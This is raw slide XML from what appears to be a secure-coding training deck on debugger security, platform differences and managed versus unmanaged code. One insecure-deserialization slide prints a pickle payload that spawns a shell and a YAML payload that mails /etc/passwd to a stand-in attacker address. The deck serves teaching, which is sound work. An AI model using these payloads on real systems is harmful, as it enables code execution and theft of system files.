          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Rounded Rectangle 51">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CED8751-27FF-4F1F-B2AC-A327304C3B38}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1181676" y="4984622"/>
              <a:ext cx="1724025" cy="624711"/>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Machine code to create the shell</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="294985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87</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="341925" y="2363222"/>
            <a:ext cx="6211275" cy="4012478"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Debugging tools:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Provide developers with extensive power over executables.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Are extremely helpful for testing and debugging software.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can be used maliciously.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Two-way security threat to test computer and developer computer.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In general, local debugging is safer than remote debugging.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If you enable remote debugging, make sure you understand the implications for your development environment, and configure it for security.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Search the vendor and community sites for your development tools to find guidelines on security practices for the debugger you use.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Debugger Security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23556" name="Picture 4" descr="Image result for comput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4812950"/>
            <a:ext cx="1487245" cy="121545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11810" y="1332627"/>
            <a:ext cx="3238648" cy="492443"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009DDC"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Attacker running debugger accesses testing computer through remote debugging hooks.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectangle 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7288160" y="2784472"/>
            <a:ext cx="1479541" cy="1692771"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009DDC"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Malicious code within the process that is being debugged may compromise the security of the developer’s computer.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="Group 8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="322410" y="1089572"/>
            <a:ext cx="1209104" cy="945866"/>
            <a:chOff x="1954597" y="1088259"/>
            <a:chExt cx="1209104" cy="945866"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="11" name="Picture 4" descr="Image result for comput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329" y="1088259"/>
              <a:ext cx="1157372" cy="94586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954597" y="1271351"/>
              <a:ext cx="920556" cy="307777"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:effectLst>
                    <a:glow rad="63500">
                      <a:schemeClr val="tx1">
                        <a:alpha val="40000"/>
                      </a:schemeClr>
                    </a:glow>
                  </a:effectLst>
                </a:rPr>
                <a:t>Attacker</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:glow rad="63500">
                    <a:schemeClr val="tx1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:glow>
                </a:effectLst>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="20" name="Group 19"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7422708" y="1026872"/>
            <a:ext cx="1137215" cy="1063370"/>
            <a:chOff x="7126914" y="1061150"/>
            <a:chExt cx="1137215" cy="1063370"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="23554" name="Picture 2" descr="Image result for comput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14" y="1061150"/>
              <a:ext cx="1137215" cy="106337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148212" y="1156392"/>
              <a:ext cx="920556" cy="523220"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:effectLst>
                    <a:glow rad="63500">
                      <a:schemeClr val="tx1">
                        <a:alpha val="40000"/>
                      </a:schemeClr>
                    </a:glow>
                  </a:effectLst>
                </a:rPr>
                <a:t>Test</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:effectLst>
                    <a:glow rad="63500">
                      <a:schemeClr val="tx1">
                        <a:alpha val="40000"/>
                      </a:schemeClr>
                    </a:glow>
                  </a:effectLst>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:effectLst>
                    <a:glow rad="63500">
                      <a:schemeClr val="tx1">
                        <a:alpha val="40000"/>
                      </a:schemeClr>
                    </a:glow>
                  </a:effectLst>
                </a:rPr>
                <a:t>App</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:glow rad="63500">
                    <a:schemeClr val="tx1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:glow>
                </a:effectLst>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Rectangle 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7294022" y="5082887"/>
            <a:ext cx="1041086" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:glow rad="63500">
                    <a:schemeClr val="tx1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:glow>
                </a:effectLst>
              </a:rPr>
              <a:t>Developer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" i="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst>
                <a:glow rad="63500">
                  <a:schemeClr val="tx1">
                    <a:alpha val="40000"/>
                  </a:schemeClr>
                </a:glow>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Freeform: Shape 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1583246" y="1219176"/>
            <a:ext cx="5860760" cy="296429"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3927231"/>
              <a:gd name="connsiteY0" fmla="*/ 234485 h 246208"/>
              <a:gd name="connsiteX1" fmla="*/ 1723292 w 3927231"/>
              <a:gd name="connsiteY1" fmla="*/ 23 h 246208"/>
              <a:gd name="connsiteX2" fmla="*/ 3927231 w 3927231"/>
              <a:gd name="connsiteY2" fmla="*/ 246208 h 246208"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2" y="connsiteY2"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3927231" h="246208">
                <a:moveTo>
                  <a:pt x="0" y="234485"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="534377" y="116277"/>
                  <a:pt x="1068754" y="-1931"/>
                  <a:pt x="1723292" y="23"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2377830" y="1977"/>
                  <a:pt x="3152530" y="124092"/>
                  <a:pt x="3927231" y="246208"/>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
        <p:nvSpPr>
          <p:cNvPr id="24" name="Freeform: Shape 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5075771">
            <a:off x="7249884" y="3164380"/>
            <a:ext cx="2821662" cy="296429"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3927231"/>
              <a:gd name="connsiteY0" fmla="*/ 234485 h 246208"/>
              <a:gd name="connsiteX1" fmla="*/ 1723292 w 3927231"/>
              <a:gd name="connsiteY1" fmla="*/ 23 h 246208"/>
              <a:gd name="connsiteX2" fmla="*/ 3927231 w 3927231"/>
              <a:gd name="connsiteY2" fmla="*/ 246208 h 246208"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2" y="connsiteY2"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3927231" h="246208">
                <a:moveTo>
                  <a:pt x="0" y="234485"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="534377" y="116277"/>
                  <a:pt x="1068754" y="-1931"/>
                  <a:pt x="1723292" y="23"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2377830" y="1977"/>
                  <a:pt x="3152530" y="124092"/>
                  <a:pt x="3927231" y="246208"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="28575" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="009DDC"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:headEnd type="none" w="lg" len="lg"/>
            <a:tailEnd type="stealth" w="lg" len="lg"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2057149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88</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="341925" y="1302040"/>
            <a:ext cx="8460150" cy="5143430"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Each application runtime environment has its own vulnerabilities. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Different </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>operating systems</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (e.g., Linux, Windows, and MacOS).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Different </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>versions or distributions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> of the same OS. For example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Windows 10 memory protection includes DEP, SEHOP, and ASLR, which make attacks on memory more difficult than they were on older systems, such as Windows XP.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Even within a specific Linux distribution, users can select which desktop environment they want to use (e.g., Gnome, KDE, Unity), each with its own unique security concerns.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Different </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>application environments and development frameworks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. For example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Various Microsoft Windows application platforms, each with its own unique security concerns:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Win32/Win64</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>.NET</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Windows 8 ("Metro") Store Apps</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Universal Windows Platform</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Differences Among Desktop Platforms</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="30728" name="Picture 8" descr="Image result for windows log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45" y="5611307"/>
            <a:ext cx="954005" cy="954005"/>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Image result for linux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323" y="4376175"/>
            <a:ext cx="900589" cy="1061250"/>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Image result for macos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936" y="5317194"/>
            <a:ext cx="1259841" cy="1259841"/>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descr="Image result for gnome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5234" y="4376175"/>
            <a:ext cx="1027469" cy="1027469"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="30738" name="Picture 18" descr="Image result for freebsd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966" y="4378433"/>
            <a:ext cx="1121235" cy="108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729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89</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Unmanaged</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Applications run directly on (or very close to) the operating system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Typical of applications written in C and C++.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Managed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Applications run in a runtime or virtual machine environment such as:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Java Virtual Machine (JVM)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Android Dalvik or Android Runtime (ART)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.NET framework</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Typical of applications written in Java, C#, Visual Basic, Python</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Opinions vary regarding which type of platform is more or less secure, although it is safe to say that the security issues differ somewhat. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Unmanaged code may be harder to decompile and reverse engineer than managed code.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Managed code may isolate applications for more security than unmanaged code.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Research the specific vulnerabilities of the platform you use, so you can:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Implement appropriate security controls.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Avoid common security defects.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Managed vs. Unmanaged</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="197969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EBDC1-F3DB-4E4A-97A2-2A2F1C5F7291}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Insecure Deserialization (Slide 2 of 2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82099159-0EB2-4703-8CF1-DE35B489ABC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="341924" y="1307130"/>
            <a:ext cx="8460152" cy="5017470"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t># pickle malicious example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>import cPickle</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>import subprocess</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>import base64</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myexploit = base64.b64encode(cPickle.dumps(malicious()))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class malicious(object):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  def __reduce__(self):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    return (subprocess.Popen, (('/bin/sh',),))</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print(myexploit)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yaml.load malicious example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>!!python/object/apply:os.system ["cat /etc/passwd | mail hacker@foo.c"]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{630AF768-1C03-4D36-93BD-785B8AAFA105}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
